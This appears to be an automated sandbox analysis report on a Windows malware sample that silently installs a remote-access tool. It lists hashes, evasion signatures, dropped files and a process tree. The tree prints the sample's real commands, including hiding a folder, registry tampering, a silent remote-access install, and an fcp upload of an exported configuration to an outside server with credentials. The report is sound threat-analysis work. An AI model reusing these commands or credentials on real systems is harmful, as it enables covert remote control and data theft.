Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
20/05/2025, 14:06
Static task
static1
Behavioral task
behavioral1
Sample
2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Resource
win10v2004-20250502-en
Behavioral task
behavioral2
Sample
2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Resource
win11-20250502-en
General
-
Target
2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
-
Size
9.1MB
-
MD5
5626d4dd5d06b612402dc73b85243a7d
-
SHA1
4111fa3b9fb47fc1fecad64e7b439251b89b724e
-
SHA256
a637241e14f11384415f02c09c63349c7b6a7e7e6b0eea58932c24f7650d0341
-
SHA512
03b5f6f84dab5a384003cdf8fad17c6c4214276f871e673352939514bd0120dda24cb644fcc0a76060d82d6d7e69f8822471e18ef2d2acd170f258aabb1a366b
-
SSDEEP
196608:iXKLL3IgcLx6WYo7JuSRZexCi/lk6/iljv4LX7XobiyUe/i/fnaDx:vL4pljJb+xCAlql74zjozR/iXo
Malware Config
Signatures
-
Rms family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rfusclient.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rfusclient.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1812 attrib.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000800000002418c-178.dat acprotect behavioral1/files/0x000700000002418d-179.dat acprotect -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rfusclient.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation 123.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation id.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 13 IoCs
pid Process 2744 123.exe 4216 rCceQHavD.exe 1952 rutserv.exe 2160 wVJxOQKKa.exe 60 rutserv.exe 824 wVJxOQKKa.exe 1048 rutserv.exe 552 rutserv.exe 2460 rfusclient.exe 768 rfusclient.exe 232 id.exe 4956 rfusclient.exe 2976 fcp.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine rutserv.exe Key opened \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine rfusclient.exe Key opened \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine rfusclient.exe Key opened \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine rutserv.exe Key opened \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine rutserv.exe -
Loads dropped DLL 1 IoCs
pid Process 2976 fcp.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 1952 rutserv.exe 60 rutserv.exe 1048 rutserv.exe 552 rutserv.exe 2460 rfusclient.exe 768 rfusclient.exe 4956 rfusclient.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4216 set thread context of 4820 4216 rCceQHavD.exe 104 PID 2160 set thread context of 824 2160 wVJxOQKKa.exe 107 -
resource yara_rule behavioral1/files/0x000800000002418c-178.dat upx behavioral1/files/0x000700000002418d-179.dat upx -
Drops file in Program Files directory 25 IoCs
description ioc Process File created C:\Program Files (x86)\System\__tmp_rar_sfx_access_check_240616000 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\vp8decoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\id.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System attrib.exe File created C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.ini 123.exe File opened for modification C:\Program Files (x86)\System 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\regedit.reg 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\install.bat 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\install.bat 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\rfusclient.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\123.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\install.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\vp8decoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\vp8encoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\rutserv.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\rutserv.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\rfusclient.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\123.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\install.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\test.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\vp8encoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\regedit.reg 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\id.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\test.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.exe 123.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wVJxOQKKa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fcp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language id.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wVJxOQKKa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rCceQHavD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1892 timeout.exe 2096 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 4568 taskkill.exe 1048 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings id.exe -
Runs .reg file with regedit 2 IoCs
pid Process 1960 regedit.exe 596 regedit.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 1952 rutserv.exe 1952 rutserv.exe 1952 rutserv.exe 1952 rutserv.exe 1952 rutserv.exe 1952 rutserv.exe 1952 rutserv.exe 1952 rutserv.exe 60 rutserv.exe 60 rutserv.exe 60 rutserv.exe 60 rutserv.exe 1048 rutserv.exe 1048 rutserv.exe 1048 rutserv.exe 1048 rutserv.exe 552 rutserv.exe 552 rutserv.exe 552 rutserv.exe 552 rutserv.exe 552 rutserv.exe 552 rutserv.exe 552 rutserv.exe 552 rutserv.exe 2460 rfusclient.exe 2460 rfusclient.exe 768 rfusclient.exe 768 rfusclient.exe 768 rfusclient.exe 768 rfusclient.exe 4956 rfusclient.exe 4956 rfusclient.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 4956 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1048 taskkill.exe Token: SeDebugPrivilege 4568 taskkill.exe Token: SeDebugPrivilege 1952 rutserv.exe Token: SeDebugPrivilege 2160 wVJxOQKKa.exe Token: SeDebugPrivilege 1048 rutserv.exe Token: SeTakeOwnershipPrivilege 552 rutserv.exe Token: SeTcbPrivilege 552 rutserv.exe Token: SeTcbPrivilege 552 rutserv.exe Token: SeDebugPrivilege 824 wVJxOQKKa.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1952 rutserv.exe 60 rutserv.exe 1048 rutserv.exe 552 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4928 wrote to memory of 4836 4928 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 88 PID 4928 wrote to memory of 4836 4928 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 88 PID 4928 wrote to memory of 4836 4928 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 88 PID 4928 wrote to memory of 3044 4928 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 89 PID 4928 wrote to memory of 3044 4928 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 89 PID 4928 wrote to memory of 3044 4928 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 89 PID 3044 wrote to memory of 2744 3044 WScript.exe 90 PID 3044 wrote to memory of 2744 3044 WScript.exe 90 PID 3044 wrote to memory of 2744 3044 WScript.exe 90 PID 4836 wrote to memory of 2596 4836 WScript.exe 91 PID 4836 wrote to memory of 2596 4836 WScript.exe 91 PID 4836 wrote to memory of 2596 4836 WScript.exe 91 PID 2596 wrote to memory of 1812 2596 cmd.exe 93 PID 2596 wrote to memory of 1812 2596 cmd.exe 93 PID 2596 wrote to memory of 1812 2596 cmd.exe 93 PID 2596 wrote to memory of 1048 2596 cmd.exe 108 PID 2596 wrote to memory of 1048 2596 cmd.exe 108 PID 2596 wrote to memory of 1048 2596 cmd.exe 108 PID 2744 wrote to memory of 4216 2744 123.exe 96 PID 2744 wrote to memory of 4216 2744 123.exe 96 PID 2744 wrote to memory of 4216 2744 123.exe 96 PID 2596 wrote to memory of 4568 2596 cmd.exe 98 PID 2596 wrote to memory of 4568 2596 cmd.exe 98 PID 2596 wrote to memory of 4568 2596 cmd.exe 98 PID 2596 wrote to memory of 4296 2596 cmd.exe 99 PID 2596 wrote to memory of 4296 2596 cmd.exe 99 PID 2596 wrote to memory of 4296 2596 cmd.exe 99 PID 2596 wrote to memory of 1960 2596 cmd.exe 100 PID 2596 wrote to memory of 1960 2596 cmd.exe 100 PID 2596 wrote to memory of 1960 2596 cmd.exe 100 PID 2596 wrote to memory of 1892 2596 cmd.exe 101 PID 2596 wrote to memory of 1892 2596 cmd.exe 101 PID 2596 wrote to memory of 1892 2596 cmd.exe 101 PID 2596 wrote to memory of 1952 2596 cmd.exe 103 PID 2596 wrote to memory of 1952 2596 cmd.exe 103 PID 2596 wrote to memory of 1952 2596 cmd.exe 103 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 4216 wrote to memory of 4820 4216 rCceQHavD.exe 104 PID 2744 wrote to memory of 2160 2744 123.exe 105 PID 2744 wrote to memory of 2160 2744 123.exe 105 PID 2744 wrote to memory of 2160 2744 123.exe 105 PID 2596 wrote to memory of 60 2596 cmd.exe 106 PID 2596 wrote to memory of 60 2596 cmd.exe 106 PID 2596 wrote to memory of 60 2596 cmd.exe 106 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2160 wrote to memory of 824 2160 wVJxOQKKa.exe 107 PID 2596 wrote to memory of 1048 2596 cmd.exe 108 PID 2596 wrote to memory of 1048 2596 cmd.exe 108 PID 2596 wrote to memory of 1048 2596 cmd.exe 108 PID 2596 wrote to memory of 2096 2596 cmd.exe 111 PID 2596 wrote to memory of 2096 2596 cmd.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1812 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files (x86)\System"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1812
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
- System Location Discovery: System Language Discovery
PID:4296
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:1960
-
-
C:\Windows\SysWOW64\timeout.exetimeout 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1892
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /silentinstall4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1952
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /firewall4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:60
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /start4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1048
-
-
C:\Windows\SysWOW64\timeout.exetimeout 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2096
-
-
C:\Windows\SysWOW64\regedit.exeregedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:596
-
-
-
C:\Program Files (x86)\System\id.exe"C:\Program Files (x86)\System\id.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:232 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\fcp.exefcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2976
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Program Files (x86)\System\123.exe"C:\Program Files (x86)\System\123.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4820
-
-
-
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
-
-
-
C:\Program Files (x86)\System\rutserv.exe"C:\Program Files (x86)\System\rutserv.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:552 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:768 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
PID:4956
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD53b084c7f7c666af58971760174c8f32b
SHA1b9a21429c6d35abf31eae7235dd3152beaf270fb
SHA2563bd176991ba3ae028d32f049636fb6db808b182c8551465479583e93d864be96
SHA512d19ee5d530475996959efa6b07bbf941e281fa310bcb9be3863f3af38c8f938d86648fd9f776032a3170dd59a0162a54a5ea28698e65ceb683e41732d21b880c
-
Filesize
388KB
MD5ba67693705f46b37b4f7d427d874d2bb
SHA1502546afcab6bf7595d98cded71007ca60c340da
SHA256f49ee07aedaaaf52c7d4153fa37a13e8e38d80d08d05144deb28820096e62862
SHA5122258342982d36c52a3a27079ab39190f1fdbb7c9c6d336175d5eda70deecf74db3862662409f77c42c5e23e3989e00b66fb91c6e56622b0712ca85c17e163fea
-
Filesize
4KB
MD5cf76cadc2887b23aab4f1f2330968548
SHA1f8f9495ff2e52e0a2dd218a56f5ec8b723f030a9
SHA256d8e903d6fc11b4c05e3999d0c21fdcce6a4136e36846b0d79bb05a9cea33c2ef
SHA51205ce5498dc762a5987ac3070b6da321e9cedced6f67fbd1929e3a6abf951b31331537e45ab64d4838204abc25f21c86d729fa2ff59b05db9aa661681937bc4b7
-
Filesize
162B
MD5316840cd95d80c8c879e0812a39e8151
SHA16b1b804219c028c18311dd5c273b0cc3730c8044
SHA2564631bc6d3ff7b81435f2451251dce0de99e0d72a9a9f7f024d001e11663cda34
